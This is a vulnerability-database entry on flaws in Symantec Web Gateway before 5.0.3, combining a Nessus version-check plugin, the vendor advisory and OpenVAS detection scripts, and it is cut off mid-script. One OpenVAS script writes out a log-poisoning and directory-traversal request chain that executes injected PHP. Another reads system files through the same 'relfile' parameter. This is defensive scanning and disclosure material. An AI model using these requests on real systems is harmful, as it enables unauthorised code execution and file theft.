Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)

2012-05-21T00:00:00

Description

According to its self-reported version number, the remote web server is hosting Symantec Web Gateway before version 5.0.3, which has the following vulnerabilities : -There are multiple cross-site scripting vulnerabilities. (CVE-2012-0296) - Multiple shell command injection and local file inclusion vulnerabilities exist that could lead to arbitrary code execution. (CVE-2012-0297) - Unauthenticated users are allowed to read/delete arbitrary files as root. (CVE-2012-0298) - A file upload vulnerability exists that could lead to arbitrary code execution. (CVE-2012-0299) A remote, unauthenticated attacker could exploit the code execution vulnerabilities to execute commands as the apache user. After exploitation, obtaining a root shell is trivial.

{"id": "SYMANTEC_WEB_GATEWAY_SYM12-006.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)", "description": "According to its self-reported version number, the remote web server is hosting Symantec Web Gateway before version 5.0.3, which has the following vulnerabilities :\n\n -There are multiple cross-site scripting vulnerabilities.\n (CVE-2012-0296)\n\n - Multiple shell command injection and local file inclusion vulnerabilities exist that could lead to arbitrary code execution. (CVE-2012-0297)\n\n - Unauthenticated users are allowed to read/delete arbitrary files as root. (CVE-2012-0298)\n\n - A file upload vulnerability exists that could lead to arbitrary code execution. (CVE-2012-0299)\n\nA remote, unauthenticated attacker could exploit the code execution vulnerabilities to execute commands as the apache user. After exploitation, obtaining a root shell is trivial.", "published": "2012-05-21T00:00:00", "modified": "2021-01-19T00:00:00", "epss": [{"cve": "CVE-2012-0296", "epss": 0.66353, "percentile": 0.97602, "modified": "2023-12-03"}, {"cve": "CVE-2012-0297", "epss": 0.97408, "percentile": 0.99911, "modified": "2023-12-03"}, {"cve": "CVE-2012-0298", "epss": 0.00307, "percentile": 0.66472, "modified": "2023-12-03"}, {"cve": "CVE-2012-0299", "epss": 0.97125, "percentile": 0.99736, "modified": "2023-12-03"}], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/59209", "reporter": "This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.securityfocus.com/archive/1/523065/30/0/threaded", "https://www.securityfocus.com/archive/1/523064/30/0/threaded", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0296", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0298", "https://www.tenable.com/security/research/tra-2012-03", "https://www.zerodayinitiative.com/advisories/ZDI-12-091/", "http://www.nessus.org/u?5b5929ae", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0299", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297", "https://www.zerodayinitiative.com/advisories/ZDI-12-090/"], "cvelist": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"], "immutableFields": [], "lastseen": "2023-12-02T14:43:26", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B3B3DA42-859E-48BF-B67E-3A4E5F266E97", "AKB:E371A741-0446-47E4-97E5-21715E5EA84A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-293", "CPAI-2012-311", "CPAI-2012-824"]}, {"type": "cve", "idList": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"]}, {"type": "d2", "idList": ["D2SEC_SYMWEBGW"]}, {"type": "dsquare", "idList": ["E-158", "E-163", "E-82"]}, {"type": "exploitdb", "idList": ["EDB-ID:19406"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9A23BC40C97079E951A8BC4B95B92342"]}, {"type": "nessus", "idList": ["SYMANTEC_WEB_GATEWAY_IPCHANGE_RCE.NASL", "SYMANTEC_WEB_GATEWAY_TIMER_XSS.NASL", "SYMANTEC_WEB_GATEWAY_UPLOAD_FILE_RCE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103484", "OPENVAS:1361412562310103489", "OPENVAS:1361412562310802632"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113050", "PACKETSTORM:113090", "PACKETSTORM:113485", "PACKETSTORM:113486", "PACKETSTORM:114231"]}, {"type": "prion", "idList": ["PRION:CVE-2012-0296", "PRION:CVE-2012-0297", "PRION:CVE-2012-0298", "PRION:CVE-2012-0299"]}, {"type": "saint", "idList": ["SAINT:09723FE34C900B59CB593CFB790946C5", "SAINT:0D475EE538584A09C093C3CE051B9477", "SAINT:79AF1DDEAA9DAE2B17DA10C8A568E698", "SAINT:CA79171627977B6EB496110895555ECA"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28147", "SECURITYVULNS:DOC:28148", "SECURITYVULNS:VULN:12416"]}, {"type": "seebug", "idList": ["SSV:73332"]}, {"type": "symantec", "idList": ["SMNTC-1250"]}, {"type": "zdi", "idList": ["ZDI-12-090", "ZDI-12-091"]}]}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2012-293", "CPAI-2012-311", "CPAI-2012-824"]}, {"type": "cve", "idList": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"]}, {"type": "dsquare", "idList": ["E-82"]}, {"type": "exploitdb", "idList": ["EDB-ID:19406"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_EXEC", "MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_FILE_UPLOAD", "MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_LFI"]}, {"type": "nessus", "idList": ["SYMANTEC_WEB_GATEWAY_TIMER_XSS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103489"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113486"]}, {"type": "saint", "idList": ["SAINT:CA79171627977B6EB496110895555ECA"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28148"]}, {"type": "seebug", "idList": ["SSV:73332"]}, {"type": "zdi", "idList": ["ZDI-12-091"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2012-0296", "epss": 0.85025, "percentile": 0.97973, "modified": "2023-05-06"}, {"cve": "CVE-2012-0297", "epss": 0.97447, "percentile": 0.99907, "modified": "2023-05-06"}, {"cve": "CVE-2012-0298", "epss": 0.00436, "percentile": 0.70936, "modified": "2023-05-06"}, {"cve": "CVE-2012-0299", "epss": 0.97198, "percentile": 0.99681, "modified": "2023-05-06"}], "vulnersScore": 0.3}, "_state": {"dependencies": 1701636640, "score": 1701635924, "epss": 0}, "_internal": {"score_hash": "57ee1a8307227d9003ed419fb62249dc"}, "pluginID": "59209", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(59209);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2012-0296\",\n \"CVE-2012-0297\",\n \"CVE-2012-0298\",\n \"CVE-2012-0299\"\n );\n script_bugtraq_id(\n 53396,\n 53442,\n 53443,\n 53444\n );\n script_xref(name:\"TRA\", value:\"TRA-2012-03\");\n script_xref(name:\"EDB-ID\", value:\"18832\");\n script_xref(name:\"EDB-ID\", value:\"18932\");\n script_xref(name:\"EDB-ID\", value:\"18942\");\n script_xref(name:\"EDB-ID\", value:\"19065\");\n script_xref(name:\"EDB-ID\", value:\"19406\");\n\n script_name(english:\"Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)\");\n script_summary(english:\"Checks SWG version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web security application hosted on the remote web server has\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote web server\nis hosting Symantec Web Gateway before version 5.0.3, which has the\nfollowing vulnerabilities :\n\n -There are multiple cross-site scripting vulnerabilities.\n (CVE-2012-0296)\n\n - Multiple shell command injection and local file inclusion\n vulnerabilities exist that could lead to arbitrary code\n execution. (CVE-2012-0297)\n\n - Unauthenticated users are allowed to read/delete arbitrary\n files as root. (CVE-2012-0298)\n\n - A file upload vulnerability exists that could lead to\n arbitrary code execution. (CVE-2012-0299)\n\nA remote, unauthenticated attacker could exploit the code execution\nvulnerabilities to execute commands as the apache user. After\nexploitation, obtaining a root shell is trivial.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2012-03\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-090/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-091/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523064/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523065/30/0/threaded\");\n # https://support.symantec.com/en_US/article.SYMSA1250.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5b5929ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Symantec Web Gateway 5.0.2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:web_gateway\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_web_gateway_detect.nasl\");\n script_require_keys(\"www/symantec_web_gateway\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"audit.inc\");\n\nport = get_http_port(default:443, php:TRUE);\ninstall = get_install_from_kb(appname:'symantec_web_gateway', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nver = install['ver'];\nfix = '5.0.3';\n\nurl = build_url(port:port, qs:dir);\n\nif (ver == UNKNOWN_VER)\n audit(AUDIT_UNKNOWN_WEB_APP_VER, 'Symantec Web Gateway', url);\n\nif (ver =~ '^5' && ver_compare(ver:ver, fix:fix, strict:FALSE) < 0)\n{\n set_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Symantec Web Gateway', url, ver);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:symantec:web_gateway"], "solution": "Upgrade to Symantec Web Gateway version 5.0.3 or later.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vendor_cvss2": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": null, "vector": null}, "vpr": {"risk factor": "High", "score": "8.9"}, "exploitAvailable": true, "exploitEase": "No exploit is required", "patchPublicationDate": "2012-05-17T00:00:00", "vulnerabilityPublicationDate": "2012-05-04T00:00:00", "exploitableWith": ["Core Impact", "Elliot(Symantec Web Gateway 5.0.2 File Upload)", "CANVAS(D2ExploitPack)", "Metasploit(Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability)"]}

{"symantec": [{"lastseen": "2021-11-07T10:51:43", "description": "### SUMMARY\n\n \n\nSymantec's Web Gateway management GUI is susceptible to file include command injection/execution, file upload/execution and file download/deletion security issues. The management GUI is also susceptible to cross-site scripting (XSS). Successful exploitation could result in execution of arbitrary code in the context of the application, denial of service through deletion of arbitrary system files, and unauthorized access to users' data or to unauthorized network information.\n\n### AFFECTED PRODUCTS\n\n \n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**Solution** \n \n---|---|--- \n \nSymantec Web Gateway\n\n| \n\n5.0.x\n\n| \n\nSymantec Web Gateway 5.0.3 \n \n### ISSUES\n\n \n\n**CVSS2**\n\n**Base Score**\n\n| \n\n**Impact**\n\n| \n\n**Exploitability**\n\n| \n\n**CVSS2 Vector** \n \n---|---|---|--- \n \n**Command injection code execution - High** \n \n8.33\n\n| \n\n**10.0**\n\n| \n\n**6.45**\n\n| \n\nAV:A/AC:L/Au:N/C:C/I:C/A:C\n\n \n \n**File include/command execution - High** \n \n7.77\n\n| \n\n**9.2**\n\n| \n\n**4.65**\n\n| \n\nAV:A/AC:L/Au:N/C:C/I:C/A:N\n\n \n \n**File download/deletion- Medium** \n \n6.1\n\n| \n\n**6.9**\n\n| \n\n**6.5**\n\n| \n\nAV:A/AC:L/Au:N/C:N/I:N/A:C \n \n**Cross-site scripting - Medium** \n \n4.33\n\n| \n\n**4.93**\n\n| \n\n**5.54**\n\n| \n\nAV:A/AC:M/Au:N/C:P/I:P/A:N \n \n \n\nBID 53444 to the file include/command execution issues\n\nBID 53442 to the file download/deletion issues\n\nBID 53443 to the file upload/OS command execution issue\n\nBID 53396 to the XSS issues\n\nCVE-2012-0297 to the file include/command execution issues\n\nCVE-2012-0298 to the file download/deletion issues\n\nCVE-2012-0299 to the file upload/OS command execution issues\n\nCVE-2012-0296 to the XSS issues\n\n### MITIGATION\n\n \n\n**Details**\n\nSymantec was notified of multiple security issues impacting the management console of the Symantec Web Gateway Appliance. The management interface does not properly authenticate or filter external input. This could allow unauthorized access to user's session or network information. As a result of weak authentication and sanitization of user controlled input, arbitrary code could potentially be injected/included in application scripts used by the Symantec Web Gateway application potentially resulting in arbitrary command execution with application privileges. \n\nAdditionally, file management scripts in the Symantec Web Gateway interface do not properly filter user input, potentially resulting in an unauthenticated, unprivileged user downloading and deleting arbitrary files including essential operational files. This could render the targeted system unavailable or unusable depending on the success of such an attempt and files targeted. An unauthenticated, unprivileged user could also upload arbitrary code through the abuse of management scripts. A malicious user could be able to control the file name and location which could potentially result in arbitrary command execution with elevated privileges.\n\nCross-site scripting vulnerabilities were also reported in the Symantec Web Gateway Management Interface. Cross-site scripting is a trust exploitation generally requiring enticing a authenticated user to click on a malicious link. A successful exploitation, depending on the nature of the link, could potentially result in arbitrary java/html requests and scripts executed in the context of the targeted user.\n\nIn a normal installation, the Symantec Web Gateway management interface should not be accessible external to the network. However, an authorized but unprivileged network user or an external attacker able to leverage network access could attempt to exploit these weaknesses. \n\n \n\n**Symantec Response**\n\nSymantec engineers verified these issues and have released an update to address them. Symantec engineers reviewed related functionality to further enhance the overall security of Symantec Web Gateway. Symantec has released Symantec Web Gateway 5.0.3, currently available to customers through normal update channels.\n\nSymantec is not aware of any exploitation of, or adverse customer impact from these issues.\n\n \n**Best Practices**\n\nAs part of normal best practices, Symantec strongly recommends:\n\n * Restrict access to administration or management systems to privileged users.\n * Disable remote access or restrict it to trusted/authorized systems only.\n * Keep all operating systems and applications updated with the latest vendor patches.\n * Follow a multi-layered approach to security. Run both firewall and anti-malware applications, at a minimum, to provide multiple points of detection and protection to both inbound and outbound threats.\n * Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in detection of attacks or malicious activity related to exploitation of latent vulnerabilities\n\n### ACKNOWLEDGEMENTS\n\n \n\nSymantec credits Tenable Network Security working through TippingPoint's [ZeroDay Initiative](<http://www.zerodayinitiative.com/>) for reporting file include, command injection/execution and file download/deletion and upload/execution issues.\n\n \n\nSymantec credits an anonymous contributor working with Beyond Security's SecuriTeam Secure Disclosure project ([http://www.beyondsecurity.com/ssd.html](<http://www.beyondsecurity.com/ssd.html>) for reporting file include, command injection/execution; file download/deletion and upload/execution issues.\n\n \n\nSymantec credits Ajay Pal Singh Atwal and an anonymous finder for reporting the cross-site scripting issues.\n\n### REFERENCES\n\n \n\n**BID:** Security Focus, [http://www.securityfocus.com](<http://www.securityfocus.com/>), has assigned the following Bugtraq IDs (BID) to these issues for inclusion in the Security Focus vulnerability database.\n\n**CVE:** These issues are candidates for inclusion in the CVE list ([http://cve.mitre.org](<http://cve.mitre.org/>)), which standardizes names for security problems. The following CVE IDs have been assigned.\n", "cvss3": {}, "published": "2012-05-17T08:00:00", "type": "symantec", "title": "Symantec Web Gateway Multiple Security Issues", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0296", "CVE-2012-0297", "CVE-2012-0298", "CVE-2012-0299"], "modified": "2020-03-05T20:47:00", "id": "SMNTC-1250", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-05-12T17:30:48", "description": "This host is running Symantec Web Gateway and is prone to command\n execution vulnerability.", "cvss3": {}, "published": "2012-06-01T00:00:00", "type": "openvas", "title": "Symantec Web Gateway Remote Shell Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0297", "CVE-2012-0299"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310802632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802632", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Symantec Web Gateway Remote Shell Command Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:web_gateway\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802632\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_bugtraq_id(53444, 53443);\n script_cve_id(\"CVE-2012-0297\", \"CVE-2012-0299\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-01 12:12:12 +0530 (Fri, 01 Jun 2012)\");\n script_name(\"Symantec Web Gateway Remote Shell Command Execution Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_symantec_web_gateway_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"symantec_web_gateway/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49216\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/18932\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\");\n\n script_tag(name:\"impact\", value:\"Successful exploits will result in the execution of arbitrary attack supplied\n commands in the context of the affected application.\");\n\n script_tag(name:\"affected\", value:\"Symantec Web Gateway versions 5.0.x before 5.0.3\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of certain unspecified\n input. This can be exploited to execute arbitrary code by injecting crafted\n data or including crafted data.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running Symantec Web Gateway and is prone to command\n execution vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.symantec.com/business/web-gateway\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:port)){\n exit(0);\n}\n\nif(dir == \"/\") dir = \"\";\nexploit= 'GET ' + dir + '/<?php phpinfo();?> HTTP/1.1\\r\\n\\r\\n';\nres = http_send_recv(port:port, data:exploit);\n\nurl = dir + \"/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log\";\nreq = http_get(item:url, port:port);\nres = http_send_recv(port:port, data:req);\n\nif(res && res =~ \"^HTTP/1\\.[01] 200\" && \"<title>phpinfo()\" >< res && \"<title>Symantec Web Gateway\" >< res){\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:30:40", "description": "This host is running Symantec Web Gateway and is prone to directory\n traversal vulnerability.", "cvss3": {}, "published": "2012-05-18T00:00:00", "type": "openvas", "title": "Symantec Web Gateway 'relfile' Parameter Directory Traversal Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0298"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310103489", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103489", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Symantec Web Gateway 'relfile' Parameter Directory Traversal Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:symantec:web_gateway\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103489\");\n script_bugtraq_id(53442);\n script_cve_id(\"CVE-2012-0298\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_version(\"2020-05-08T08:34:44+0000\");\n\n script_name(\"Symantec Web Gateway 'relfile' Parameter Directory Traversal Vulnerability\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-05-18 10:03:57 +0200 (Fri, 18 May 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_symantec_web_gateway_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"symantec_web_gateway/installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to read arbitrary files via\n directory traversal attacks and gain sensitive information.\");\n script_tag(name:\"affected\", value:\"Symantec Web Gateway versions 5.0.x before 5.0.3\");\n script_tag(name:\"insight\", value:\"The flaw is due to an improper validation of user-supplied input\n passed via the 'relfile' parameter to the '/spywall/releasenotes.php',\n which allows attackers to read arbitrary files via a ../(dot dot) sequences.\");\n script_tag(name:\"solution\", value:\"Upgrade to Symantec Web Gateway version 5.0.3 or later.\");\n script_tag(name:\"summary\", value:\"This host is running Symantec Web Gateway and is prone to directory\n traversal vulnerability.\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/53442\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/business/web-gateway\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49216\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port))exit(0);\n\nfiles = traversal_files(\"linux\");\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = string(dir, \"/spywall/releasenotes.php?relfile=../../../../../\" + files);\n\n if(http_vuln_check(port:port, url:url, pattern:pattern)) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(data:report, port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2019-12-06T16:45:25", "description": "Symantec Web Gateway is prone to a cross-site scripting vulnerability\nbecause it fails to properly sanitize user-supplied input.", "cvss3": {}, "published": "2012-05-07T00:00:00", "type": "openvas", "title": "Symantec Web Gateway 'l' Parameter Cross Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0296"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310103484", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103484", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Symantec Web Gateway 'l' Parameter Cross Site Scripting Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:web_gateway\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103484\");\n script_bugtraq_id(53396);\n script_version(\"2019-12-05T15:10:00+0000\");\n script_cve_id(\"CVE-2012-0296\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_name(\"Symantec Web Gateway 'l' Parameter Cross Site Scripting Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/53396\");\n script_xref(name:\"URL\", value:\"http://www.symantec.com/business/web-gateway\");\n script_xref(name:\"URL\", value:\"https://support.symantec.com/en_US/article.SYMSA1250.html\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-05-07 14:02:06 +0200 (Mon, 07 May 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_symantec_web_gateway_detect.nasl\");\n 